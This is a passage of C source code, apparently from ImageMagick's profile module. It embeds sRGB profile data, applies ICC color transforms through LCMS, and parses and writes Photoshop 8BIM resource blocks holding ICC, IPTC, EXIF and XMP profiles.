0x9e, 0xae, 0x9f, 0x1d, 0x9f, 0x8b, 0x9f, 0xfa, 0xa0, 0x69, 0xa0, 0xd8,
0xa1, 0x47, 0xa1, 0xb6, 0xa2, 0x26, 0xa2, 0x96, 0xa3, 0x06, 0xa3, 0x76,
0xa3, 0xe6, 0xa4, 0x56, 0xa4, 0xc7, 0xa5, 0x38, 0xa5, 0xa9, 0xa6, 0x1a,
0xa6, 0x8b, 0xa6, 0xfd, 0xa7, 0x6e, 0xa7, 0xe0, 0xa8, 0x52, 0xa8, 0xc4,
0xa9, 0x37, 0xa9, 0xa9, 0xaa, 0x1c, 0xaa, 0x8f, 0xab, 0x02, 0xab, 0x75,
0xab, 0xe9, 0xac, 0x5c, 0xac, 0xd0, 0xad, 0x44, 0xad, 0xb8, 0xae, 0x2d,
0xae, 0xa1, 0xaf, 0x16, 0xaf, 0x8b, 0xb0, 0x00, 0xb0, 0x75, 0xb0, 0xea,
0xb1, 0x60, 0xb1, 0xd6, 0xb2, 0x4b, 0xb2, 0xc2, 0xb3, 0x38, 0xb3, 0xae,
0xb4, 0x25, 0xb4, 0x9c, 0xb5, 0x13, 0xb5, 0x8a, 0xb6, 0x01, 0xb6, 0x79,
0xb6, 0xf0, 0xb7, 0x68, 0xb7, 0xe0, 0xb8, 0x59, 0xb8, 0xd1, 0xb9, 0x4a,
0xb9, 0xc2, 0xba, 0x3b, 0xba, 0xb5, 0xbb, 0x2e, 0xbb, 0xa7, 0xbc, 0x21,
0xbc, 0x9b, 0xbd, 0x15, 0xbd, 0x8f, 0xbe, 0x0a, 0xbe, 0x84, 0xbe, 0xff,
0xbf, 0x7a, 0xbf, 0xf5, 0xc0, 0x70, 0xc0, 0xec, 0xc1, 0x67, 0xc1, 0xe3,
0xc2, 0x5f, 0xc2, 0xdb, 0xc3, 0x58, 0xc3, 0xd4, 0xc4, 0x51, 0xc4, 0xce,
0xc5, 0x4b, 0xc5, 0xc8, 0xc6, 0x46, 0xc6, 0xc3, 0xc7, 0x41, 0xc7, 0xbf,
0xc8, 0x3d, 0xc8, 0xbc, 0xc9, 0x3a, 0xc9, 0xb9, 0xca, 0x38, 0xca, 0xb7,
0xcb, 0x36, 0xcb, 0xb6, 0xcc, 0x35, 0xcc, 0xb5, 0xcd, 0x35, 0xcd, 0xb5,
0xce, 0x36, 0xce, 0xb6, 0xcf, 0x37, 0xcf, 0xb8, 0xd0, 0x39, 0xd0, 0xba,
0xd1, 0x3c, 0xd1, 0xbe, 0xd2, 0x3f, 0xd2, 0xc1, 0xd3, 0x44, 0xd3, 0xc6,
0xd4, 0x49, 0xd4, 0xcb, 0xd5, 0x4e, 0xd5, 0xd1, 0xd6, 0x55, 0xd6, 0xd8,
0xd7, 0x5c, 0xd7, 0xe0, 0xd8, 0x64, 0xd8, 0xe8, 0xd9, 0x6c, 0xd9, 0xf1,
0xda, 0x76, 0xda, 0xfb, 0xdb, 0x80, 0xdc, 0x05, 0xdc, 0x8a, 0xdd, 0x10,
0xdd, 0x96, 0xde, 0x1c, 0xde, 0xa2, 0xdf, 0x29, 0xdf, 0xaf, 0xe0, 0x36,
0xe0, 0xbd, 0xe1, 0x44, 0xe1, 0xcc, 0xe2, 0x53, 0xe2, 0xdb, 0xe3, 0x63,
0xe3, 0xeb, 0xe4, 0x73, 0xe4, 0xfc, 0xe5, 0x84, 0xe6, 0x0d, 0xe6, 0x96,
0xe7, 0x1f, 0xe7, 0xa9, 0xe8, 0x32, 0xe8, 0xbc, 0xe9, 0x46, 0xe9, 0xd0,
0xea, 0x5b, 0xea, 0xe5, 0xeb, 0x70, 0xeb, 0xfb, 0xec, 0x86, 0xed, 0x11,
0xed, 0x9c, 0xee, 0x28, 0xee, 0xb4, 0xef, 0x40, 0xef, 0xcc, 0xf0, 0x58,
0xf0, 0xe5, 0xf1, 0x72, 0xf1, 0xff, 0xf2, 0x8c, 0xf3, 0x19, 0xf3, 0xa7,
0xf4, 0x34, 0xf4, 0xc2, 0xf5, 0x50, 0xf5, 0xde, 0xf6, 0x6d, 0xf6, 0xfb,
0xf7, 0x8a, 0xf8, 0x19, 0xf8, 0xa8, 0xf9, 0x38, 0xf9, 0xc7, 0xfa, 0x57,
0xfa, 0xe7, 0xfb, 0x77, 0xfc, 0x07, 0xfc, 0x98, 0xfd, 0x29, 0xfd, 0xba,
0xfe, 0x4b, 0xfe, 0xdc, 0xff, 0x6d, 0xff, 0xff
};
StringInfo
*profile;
MagickBooleanType
status;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (GetImageProfile(image,"icc") != (const StringInfo *) NULL)
return(MagickFalse);
profile=AcquireStringInfo(sizeof(sRGBProfile));
SetStringInfoDatum(profile,sRGBProfile);
status=SetImageProfile(image,"icc",profile);
profile=DestroyStringInfo(profile);
return(status);
}
MagickExport MagickBooleanType ProfileImage(Image *image,const char *name,
const void *datum,const size_t length,
const MagickBooleanType magick_unused(clone))
{
#define ProfileImageTag "Profile/Image"
#define ThrowProfileException(severity,tag,context) \
{ \
if (source_profile != (cmsHPROFILE) NULL) \
(void) cmsCloseProfile(source_profile); \
if (target_profile != (cmsHPROFILE) NULL) \
(void) cmsCloseProfile(target_profile); \
ThrowBinaryException(severity,tag,context); \
}
MagickBooleanType
status;
StringInfo
*profile;
magick_unreferenced(clone);
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(name != (const char *) NULL);
if ((datum == (const void *) NULL) || (length == 0))
{
char
*next;
/*
Delete image profile(s).
*/
ResetImageProfileIterator(image);
for (next=GetNextImageProfile(image); next != (const char *) NULL; )
{
if (IsOptionMember(next,name) != MagickFalse)
{
(void) DeleteImageProfile(image,next);
ResetImageProfileIterator(image);
}
next=GetNextImageProfile(image);
}
return(MagickTrue);
}
/*
Add a ICC, IPTC, or generic profile to the image.
*/
status=MagickTrue;
profile=AcquireStringInfo((size_t) length);
SetStringInfoDatum(profile,(unsigned char *) datum);
if ((LocaleCompare(name,"icc") != 0) && (LocaleCompare(name,"icm") != 0))
status=SetImageProfile(image,name,profile);
else
{
const StringInfo
*icc_profile;
icc_profile=GetImageProfile(image,"icc");
if ((icc_profile != (const StringInfo *) NULL) &&
(CompareStringInfo(icc_profile,profile) == 0))
{
const char
*value;
value=GetImageProperty(image,"exif:ColorSpace");
(void) value;
if (LocaleCompare(value,"1") != 0)
(void) SetsRGBImageProfile(image);
value=GetImageProperty(image,"exif:InteroperabilityIndex");
if (LocaleCompare(value,"R98.") != 0)
(void) SetsRGBImageProfile(image);
/* Future.
value=GetImageProperty(image,"exif:InteroperabilityIndex");
if (LocaleCompare(value,"R03.") != 0)
(void) SetAdobeRGB1998ImageProfile(image);
*/
icc_profile=GetImageProfile(image,"icc");
}
if ((icc_profile != (const StringInfo *) NULL) &&
(CompareStringInfo(icc_profile,profile) == 0))
{
profile=DestroyStringInfo(profile);
return(MagickTrue);
}
#if !defined(MAGICKCORE_LCMS_DELEGATE)
(void) ThrowMagickException(&image->exception,GetMagickModule(),
MissingDelegateWarning,"DelegateLibrarySupportNotBuiltIn","`%s' (LCMS)",
image->filename);
#else
{
cmsHPROFILE
source_profile;
/*
Transform pixel colors as defined by the color profiles.
*/
cmsSetLogErrorHandler(LCMSExceptionHandler);
source_profile=cmsOpenProfileFromMemTHR((cmsContext) image,
GetStringInfoDatum(profile),(cmsUInt32Number)
GetStringInfoLength(profile));
if (source_profile == (cmsHPROFILE) NULL)
ThrowBinaryException(ResourceLimitError,
"ColorspaceColorProfileMismatch",name);
if ((cmsGetDeviceClass(source_profile) != cmsSigLinkClass) &&
(icc_profile == (StringInfo *) NULL))
status=SetImageProfile(image,name,profile);
else
{
CacheView
*image_view;
ColorspaceType
source_colorspace,
target_colorspace;
cmsColorSpaceSignature
signature;
cmsHPROFILE
target_profile;
cmsHTRANSFORM
*magick_restrict transform;
cmsUInt32Number
flags,
source_type,
target_type;
ExceptionInfo
*exception;
int
intent;
LCMSType
**magick_restrict source_pixels,
**magick_restrict target_pixels;
#if defined(LCMSHDRI)
LCMSType
source_scale,
target_scale;
#endif
MagickOffsetType
progress;
size_t
source_channels,
target_channels;
ssize_t
y;
exception=(&image->exception);
target_profile=(cmsHPROFILE) NULL;
if (icc_profile != (StringInfo *) NULL)
{
target_profile=source_profile;
source_profile=cmsOpenProfileFromMemTHR((cmsContext) image,
GetStringInfoDatum(icc_profile),(cmsUInt32Number)
GetStringInfoLength(icc_profile));
if (source_profile == (cmsHPROFILE) NULL)
ThrowProfileException(ResourceLimitError,
"ColorspaceColorProfileMismatch",name);
}
#if defined(LCMSHDRI)
source_scale=1.0;
#endif
source_channels=3;
switch (cmsGetColorSpace(source_profile))
{
case cmsSigCmykData:
{
source_colorspace=CMYKColorspace;
source_channels=4;
#if defined(LCMSHDRI)
source_type=(cmsUInt32Number) TYPE_CMYK_DBL;
source_scale=100.0;
#else
source_type=(cmsUInt32Number) TYPE_CMYK_16;
#endif
break;
}
case cmsSigGrayData:
{
source_colorspace=GRAYColorspace;
source_channels=1;
#if defined(LCMSHDRI)
source_type=(cmsUInt32Number) TYPE_GRAY_DBL;
#else
source_type=(cmsUInt32Number) TYPE_GRAY_16;
#endif
break;
}
case cmsSigLabData:
{
source_colorspace=LabColorspace;
#if defined(LCMSHDRI)
source_type=(cmsUInt32Number) TYPE_Lab_DBL;
source_scale=100.0;
#else
source_type=(cmsUInt32Number) TYPE_Lab_16;
#endif
break;
}
#if !defined(LCMSHDRI)
case cmsSigLuvData:
{
source_colorspace=YUVColorspace;
source_type=(cmsUInt32Number) TYPE_YUV_16;
break;
}
#endif
case cmsSigRgbData:
{
#if defined(LCMSHDRI)
source_colorspace=sRGBColorspace;
source_type=(cmsUInt32Number) TYPE_RGB_DBL;
#else
source_type=(cmsUInt32Number) TYPE_RGB_16;
#endif
break;
}
case cmsSigXYZData:
{
source_colorspace=XYZColorspace;
#if defined(LCMSHDRI)
source_type=(cmsUInt32Number) TYPE_XYZ_DBL;
#else
source_type=(cmsUInt32Number) TYPE_XYZ_16;
#endif
break;
}
#if !defined(LCMSHDRI)
case cmsSigYCbCrData:
{
source_colorspace=YUVColorspace;
source_type=(cmsUInt32Number) TYPE_YCbCr_16;
break;
}
#endif
default:
ThrowProfileException(ImageError,
"ColorspaceColorProfileMismatch",name);
}
(void) source_colorspace;
signature=cmsGetPCS(source_profile);
if (target_profile != (cmsHPROFILE) NULL)
signature=cmsGetColorSpace(target_profile);
#if defined(LCMSHDRI)
target_scale=1.0;
#endif
target_channels=3;
switch (signature)
{
case cmsSigCmykData:
{
target_colorspace=CMYKColorspace;
target_channels=4;
#if defined(LCMSHDRI)
target_type=(cmsUInt32Number) TYPE_CMYK_DBL;
target_scale=0.01;
#else
target_type=(cmsUInt32Number) TYPE_CMYK_16;
#endif
break;
}
case cmsSigGrayData:
{
target_colorspace=GRAYColorspace;
target_channels=1;
#if defined(LCMSHDRI)
target_type=(cmsUInt32Number) TYPE_GRAY_DBL;
#else
target_type=(cmsUInt32Number) TYPE_GRAY_16;
#endif
break;
}
case cmsSigLabData:
{
target_colorspace=LabColorspace;
#if defined(LCMSHDRI)
target_type=(cmsUInt32Number) TYPE_Lab_DBL;
target_scale=0.01;
#else
target_type=(cmsUInt32Number) TYPE_Lab_16;
#endif
break;
}
#if !defined(LCMSHDRI)
case cmsSigLuvData:
{
target_colorspace=YUVColorspace;
target_type=(cmsUInt32Number) TYPE_YUV_16;
break;
}
#endif
case cmsSigRgbData:
{
target_colorspace=sRGBColorspace;
#if defined(LCMSHDRI)
target_type=(cmsUInt32Number) TYPE_RGB_DBL;
#else
target_type=(cmsUInt32Number) TYPE_RGB_16;
#endif
break;
}
case cmsSigXYZData:
{
target_colorspace=XYZColorspace;
#if defined(LCMSHDRI)
target_type=(cmsUInt32Number) TYPE_XYZ_DBL;
#else
target_type=(cmsUInt32Number) TYPE_XYZ_16;
#endif
break;
}
default:
ThrowProfileException(ImageError,
"ColorspaceColorProfileMismatch",name);
}
switch (image->rendering_intent)
{
case AbsoluteIntent: intent=INTENT_ABSOLUTE_COLORIMETRIC; break;
case PerceptualIntent: intent=INTENT_PERCEPTUAL; break;
case RelativeIntent: intent=INTENT_RELATIVE_COLORIMETRIC; break;
case SaturationIntent: intent=INTENT_SATURATION; break;
default: intent=INTENT_PERCEPTUAL; break;
}
flags=cmsFLAGS_HIGHRESPRECALC;
#if defined(cmsFLAGS_BLACKPOINTCOMPENSATION)
if (image->black_point_compensation != MagickFalse)
flags|=cmsFLAGS_BLACKPOINTCOMPENSATION;
#endif
transform=AcquireTransformThreadSet(image,source_profile,
source_type,target_profile,target_type,intent,flags);
if (transform == (cmsHTRANSFORM *) NULL)
ThrowProfileException(ImageError,"UnableToCreateColorTransform",
name);
/*
Transform image as dictated by the source & target image profiles.
*/
source_pixels=AcquirePixelThreadSet(image->columns,source_channels);
target_pixels=AcquirePixelThreadSet(image->columns,target_channels);
if ((source_pixels == (LCMSType **) NULL) ||
(target_pixels == (LCMSType **) NULL))
{
target_pixels=DestroyPixelThreadSet(target_pixels);
source_pixels=DestroyPixelThreadSet(source_pixels);
transform=DestroyTransformThreadSet(transform);
ThrowProfileException(ResourceLimitError,
"MemoryAllocationFailed",image->filename);
}
if (SetImageStorageClass(image,DirectClass) == MagickFalse)
{
target_pixels=DestroyPixelThreadSet(target_pixels);
source_pixels=DestroyPixelThreadSet(source_pixels);
transform=DestroyTransformThreadSet(transform);
if (source_profile != (cmsHPROFILE) NULL)
(void) cmsCloseProfile(source_profile);
if (target_profile != (cmsHPROFILE) NULL)
(void) cmsCloseProfile(target_profile);
return(MagickFalse);
}
if (target_colorspace == CMYKColorspace)
(void) SetImageColorspace(image,target_colorspace);
progress=0;
image_view=AcquireAuthenticCacheView(image,exception);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(status) \
magick_number_threads(image,image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
const int
id = GetOpenMPThreadId();
MagickBooleanType
sync;
register IndexPacket
*magick_restrict indexes;
register LCMSType
*p;
register PixelPacket
*magick_restrict q;
register ssize_t
x;
if (status == MagickFalse)
continue;
q=GetCacheViewAuthenticPixels(image_view,0,y,image->columns,1,
exception);
if (q == (PixelPacket *) NULL)
{
status=MagickFalse;
continue;
}
indexes=GetCacheViewAuthenticIndexQueue(image_view);
p=source_pixels[id];
for (x=0; x < (ssize_t) image->columns; x++)
{
*p++=LCMSScaleSource(GetPixelRed(q));
if (source_channels > 1)
{
*p++=LCMSScaleSource(GetPixelGreen(q));
*p++=LCMSScaleSource(GetPixelBlue(q));
}
if (source_channels > 3)
*p++=LCMSScaleSource(GetPixelIndex(indexes+x));
q++;
}
cmsDoTransform(transform[id],source_pixels[id],target_pixels[id],
(unsigned int) image->columns);
p=target_pixels[id];
q-=image->columns;
for (x=0; x < (ssize_t) image->columns; x++)
{
SetPixelRed(q,LCMSScaleTarget(*p));
SetPixelGreen(q,GetPixelRed(q));
SetPixelBlue(q,GetPixelRed(q));
p++;
if (target_channels > 1)
{
SetPixelGreen(q,LCMSScaleTarget(*p));
p++;
SetPixelBlue(q,LCMSScaleTarget(*p));
p++;
}
if (target_channels > 3)
{
SetPixelIndex(indexes+x,LCMSScaleTarget(*p));
p++;
}
q++;
}
sync=SyncCacheViewAuthenticPixels(image_view,exception);
if (sync == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp critical (MagickCore_ProfileImage)
#endif
proceed=SetImageProgress(image,ProfileImageTag,progress++,
image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
image_view=DestroyCacheView(image_view);
(void) SetImageColorspace(image,target_colorspace);
switch (signature)
{
case cmsSigRgbData:
{
image->type=image->matte == MagickFalse ? TrueColorType :
TrueColorMatteType;
break;
}
case cmsSigCmykData:
{
image->type=image->matte == MagickFalse ? ColorSeparationType :
ColorSeparationMatteType;
break;
}
case cmsSigGrayData:
{
image->type=image->matte == MagickFalse ? GrayscaleType :
GrayscaleMatteType;
break;
}
default:
break;
}
target_pixels=DestroyPixelThreadSet(target_pixels);
source_pixels=DestroyPixelThreadSet(source_pixels);
transform=DestroyTransformThreadSet(transform);
if ((status != MagickFalse) &&
(cmsGetDeviceClass(source_profile) != cmsSigLinkClass))
status=SetImageProfile(image,name,profile);
if (target_profile != (cmsHPROFILE) NULL)
(void) cmsCloseProfile(target_profile);
}
(void) cmsCloseProfile(source_profile);
}
#endif
}
profile=DestroyStringInfo(profile);
return(status);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e m o v e I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% RemoveImageProfile() removes a named profile from the image and returns its
% value.
%
% The format of the RemoveImageProfile method is:
%
% void *RemoveImageProfile(Image *image,const char *name)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: the profile name.
%
*/
MagickExport StringInfo *RemoveImageProfile(Image *image,const char *name)
{
StringInfo
*profile;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return((StringInfo *) NULL);
if (LocaleCompare(name,"icc") == 0)
{
/*
Continue to support deprecated color profile for now.
*/
image->color_profile.length=0;
image->color_profile.info=(unsigned char *) NULL;
}
if (LocaleCompare(name,"iptc") == 0)
{
/*
Continue to support deprecated IPTC profile for now.
*/
image->iptc_profile.length=0;
image->iptc_profile.info=(unsigned char *) NULL;
}
WriteTo8BimProfile(image,name,(StringInfo *) NULL);
profile=(StringInfo *) RemoveNodeFromSplayTree((SplayTreeInfo *)
image->profiles,name);
return(profile);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e s e t P r o f i l e I t e r a t o r %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ResetImageProfileIterator() resets the image profile iterator. Use it in
% conjunction with GetNextImageProfile() to iterate over all the profiles
% associated with an image.
%
% The format of the ResetImageProfileIterator method is:
%
% ResetImageProfileIterator(Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
MagickExport void ResetImageProfileIterator(const Image *image)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return;
ResetSplayTreeIterator((SplayTreeInfo *) image->profiles);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S e t I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% SetImageProfile() adds a named profile to the image. If a profile with the
% same name already exists, it is replaced. This method differs from the
% ProfileImage() method in that it does not apply CMS color profiles.
%
% The format of the SetImageProfile method is:
%
% MagickBooleanType SetImageProfile(Image *image,const char *name,
% const StringInfo *profile)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: the profile name, for example icc, exif, and 8bim (8bim is the
% Photoshop wrapper for iptc profiles).
%
% o profile: A StringInfo structure that contains the named profile.
%
*/
static void *DestroyProfile(void *profile)
{
return((void *) DestroyStringInfo((StringInfo *) profile));
}
static inline const unsigned char *ReadResourceByte(const unsigned char *p,
unsigned char *quantum)
{
*quantum=(*p++);
return(p);
}
static inline const unsigned char *ReadResourceLong(const unsigned char *p,
unsigned int *quantum)
{
*quantum=(unsigned int) (*p++) << 24;
*quantum|=(unsigned int) (*p++) << 16;
*quantum|=(unsigned int) (*p++) << 8;
*quantum|=(unsigned int) (*p++);
return(p);
}
static inline const unsigned char *ReadResourceShort(const unsigned char *p,
unsigned short *quantum)
{
*quantum=(unsigned short) (*p++) << 8;
*quantum|=(unsigned short) (*p++);
return(p);
}
static inline void WriteResourceLong(unsigned char *p,
const unsigned int quantum)
{
unsigned char
buffer[4];
buffer[0]=(unsigned char) (quantum >> 24);
buffer[1]=(unsigned char) (quantum >> 16);
buffer[2]=(unsigned char) (quantum >> 8);
buffer[3]=(unsigned char) quantum;
(void) memcpy(p,buffer,4);
}
static void WriteTo8BimProfile(Image *image,const char *name,
const StringInfo *profile)
{
const unsigned char
*datum,
*q;
register const unsigned char
*p;
size_t
length;
StringInfo
*profile_8bim;
ssize_t
count;
unsigned char
length_byte;
unsigned int
value;
unsigned short
id,
profile_id;
if (LocaleCompare(name,"icc") == 0)
profile_id=0x040f;
else
if (LocaleCompare(name,"iptc") == 0)
profile_id=0x0404;
else
if (LocaleCompare(name,"xmp") == 0)
profile_id=0x0424;
else
return;
profile_8bim=(StringInfo *) GetValueFromSplayTree((SplayTreeInfo *)
image->profiles,"8bim");
if (profile_8bim == (StringInfo *) NULL)
return;
datum=GetStringInfoDatum(profile_8bim);
length=GetStringInfoLength(profile_8bim);
for (p=datum; p < (datum+length-16); )
{
q=p;
if (LocaleNCompare((char *) p,"8BIM",4) != 0)
break;
p+=4;
p=ReadResourceShort(p,&id);
p=ReadResourceByte(p,&length_byte);
p+=length_byte;
if (((length_byte+1) & 0x01) != 0)
p++;
if (p > (datum+length-4))
break;
p=ReadResourceLong(p,&value);
count=(ssize_t) value;
if ((count & 0x01) != 0)
count++;
if ((count < 0) || (p > (datum+length-count)) || (count > (ssize_t) length))
break;
if (id != profile_id)
p+=count;
else
{
size_t
extent,
offset;
ssize_t
extract_extent;
StringInfo
*extract_profile;
extract_extent=0;
extent=(datum+length)-(p+count);
if (profile == (StringInfo *) NULL)
{
offset=(q-datum);
extract_profile=AcquireStringInfo(offset+extent);
(void) memcpy(extract_profile->datum,datum,offset);
}
else
{
offset=(p-datum);
extract_extent=profile->length;
if ((extract_extent & 0x01) != 0)
extract_extent++;
extract_profile=AcquireStringInfo(offset+extract_extent+extent);
(void) memcpy(extract_profile->datum,datum,offset-4);
WriteResourceLong(extract_profile->datum+offset-4,(unsigned int)
profile->length);
(void) memcpy(extract_profile->datum+offset,
profile->datum,profile->length);
}
(void) memcpy(extract_profile->datum+offset+extract_extent,
p+count,extent);
(void) AddValueToSplayTree((SplayTreeInfo *) image->profiles,
ConstantString("8bim"),CloneStringInfo(extract_profile));
extract_profile=DestroyStringInfo(extract_profile);
break;
}
}
}
static void GetProfilesFromResourceBlock(Image *image,
const StringInfo *resource_block)
{
const unsigned char
*datum;
register const unsigned char
*p;
size_t
length;
ssize_t
count;
StringInfo
*profile;
unsigned char
length_byte;
unsigned int
value;
unsigned short
id;
datum=GetStringInfoDatum(resource_block);
length=GetStringInfoLength(resource_block);
for (p=datum; p < (datum+length-16); )
{
if (LocaleNCompare((char *) p,"8BIM",4) != 0)
break;
p+=4;
p=ReadResourceShort(p,&id);
p=ReadResourceByte(p,&length_byte);
p+=length_byte;
if (((length_byte+1) & 0x01) != 0)
p++;
if (p > (datum+length-4))
break;
p=ReadResourceLong(p,&value);
count=(ssize_t) value;
if ((p > (datum+length-count)) || (count > (ssize_t) length) || (count < 0))
break;
switch (id)
{
case 0x03ed:
{
unsigned int
resolution;
unsigned short
units;
/*
Resolution.
*/
if (count < 10)
break;
p=ReadResourceLong(p,&resolution);
image->x_resolution=((double) resolution)/65536.0;
p=ReadResourceShort(p,&units)+2;
p=ReadResourceLong(p,&resolution)+4;
image->y_resolution=((double) resolution)/65536.0;
/*
Values are always stored as pixels per inch.
*/
if ((ResolutionType) units != PixelsPerCentimeterResolution)
image->units=PixelsPerInchResolution;
else
{
image->units=PixelsPerCentimeterResolution;
image->x_resolution/=2.54;
image->y_resolution/=2.54;
}
break;
}
case 0x0404:
{
/*
IPTC Profile
*/
profile=AcquireStringInfo(count);
SetStringInfoDatum(profile,p);
(void) SetImageProfileInternal(image,"iptc",profile,MagickTrue);
profile=DestroyStringInfo(profile);
p+=count;
break;
}
case 0x040c:
{
/*
Thumbnail.
*/
p+=count;
break;
}
case 0x040f:
{
/*
ICC Profile.
*/
profile=AcquireStringInfo(count);
SetStringInfoDatum(profile,p);
(void) SetImageProfileInternal(image,"icc",profile,MagickTrue);
profile=DestroyStringInfo(profile);
p+=count;
break;
}
case 0x0422:
{
/*
EXIF Profile.
*/
profile=AcquireStringInfo(count);
SetStringInfoDatum(profile,p);
(void) SetImageProfileInternal(image,"exif",profile,MagickTrue);
profile=DestroyStringInfo(profile);
p+=count;
break;
}
case 0x0424:
{
/*
XMP Profile.
*/
profile=AcquireStringInfo(count);
SetStringInfoDatum(profile,p);
(void) SetImageProfileInternal(image,"xmp",profile,MagickTrue);
profile=DestroyStringInfo(profile);
p+=count;
break;
}
default:
{
p+=count;
break;
}
}
if ((count & 0x01) != 0)
p++;
}
}
static MagickBooleanType SetImageProfileInternal(Image *image,const char *name,
const StringInfo *profile,const MagickBooleanType recursive)
{
char
key[MaxTextExtent],
property[MaxTextExtent];
MagickBooleanType
status;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
image->profiles=NewSplayTree(CompareSplayTreeString,RelinquishMagickMemory,
DestroyProfile);
(void) CopyMagickString(key,name,MaxTextExtent);
LocaleLower(key);
status=AddValueToSplayTree((SplayTreeInfo *) image->profiles,
ConstantString(key),CloneStringInfo(profile));
if ((status != MagickFalse) &&
((LocaleCompare(name,"icc") == 0) || (LocaleCompare(name,"icm") == 0)))
{
const StringInfo
*icc_profile;
/*
Continue to support deprecated color profile member.
*/
icc_profile=GetImageProfile(image,name);
if (icc_profile != (const StringInfo *) NULL)
{
image->color_profile.length=GetStringInfoLength(icc_profile);
image->color_profile.info=GetStringInfoDatum(icc_profile);
}
}
if ((status != MagickFalse) &&
((LocaleCompare(name,"iptc") == 0) || (LocaleCompare(name,"8bim") == 0)))
{
const StringInfo
*iptc_profile;
/*
Continue to support deprecated IPTC profile member.
*/
iptc_profile=GetImageProfile(image,name);
if (iptc_profile != (const StringInfo *) NULL)
{
image->iptc_profile.length=GetStringInfoLength(iptc_profile);
image->iptc_profile.info=GetStringInfoDatum(iptc_profile);
}
}
if (status != MagickFalse)
{
if (LocaleCompare(name,"8bim") == 0)
GetProfilesFromResourceBlock(image,profile);
else
if (recursive == MagickFalse)
WriteTo8BimProfile(image,name,profile);
}
/*
Inject profile into image properties.
*/
(void) FormatLocaleString(property,MaxTextExtent,"%s:*",name);
(void) GetImageProperty(image,property);
return(status);
}
MagickExport MagickBooleanType SetImageProfile(Image *image,const char *name,
const StringInfo *profile)
{
return(SetImageProfileInternal(image,name,profile,MagickFalse));
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S y n c I m a g e P r o f i l e s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% SyncImageProfiles() synchronizes image properties with the image profiles.
% Currently we only support updating the EXIF resolution and orientation.
%
% The format of the SyncImageProfiles method is:
%
% MagickBooleanType SyncImageProfiles(Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
static inline int ReadProfileByte(unsigned char **p,size_t *length)
{
int
c;
if (*length < 1)
return(EOF);
c=(int) (*(*p)++);
(*length)--;
return(c);
}
static inline signed short ReadProfileShort(const EndianType endian,
unsigned char *buffer)
{
union
{
unsigned int
unsigned_value;
signed int
signed_value;
} quantum;
unsigned short
value;
if (endian == LSBEndian)
{
value=(unsigned short) buffer[1] << 8;
value|=(unsigned short) buffer[0];
quantum.unsigned_value=value & 0xffff;
return(quantum.signed_value);
}
value=(unsigned short) buffer[0] << 8;
value|=(unsigned short) buffer[1];
quantum.unsigned_value=value & 0xffff;
return(quantum.signed_value);
}
static inline signed int ReadProfileLong(const EndianType endian,
unsigned char *buffer)
{
union
{
unsigned int
unsigned_value;
signed int
signed_value;
} quantum;
unsigned int
value;
if (endian == LSBEndian)
{
value=(unsigned int) buffer[3] << 24;
value|=(unsigned int) buffer[2] << 16;
value|=(unsigned int) buffer[1] << 8;
value|=(unsigned int) buffer[0];
quantum.unsigned_value=value & 0xffffffff;
return(quantum.signed_value);
}
value=(unsigned int) buffer[0] << 24;
value|=(unsigned int) buffer[1] << 16;
value|=(unsigned int) buffer[2] << 8;
value|=(unsigned int) buffer[3];
quantum.unsigned_value=value & 0xffffffff;
return(quantum.signed_value);
}
static inline signed int ReadProfileMSBLong(unsigned char **p,size_t *length)
{
signed int
value;
if (*length < 4)
return(0);
value=ReadProfileLong(MSBEndian,*p);
(*length)-=4;
*p+=4;
return(value);
}
static inline signed short ReadProfileMSBShort(unsigned char **p,
size_t *length)
{
signed short
value;
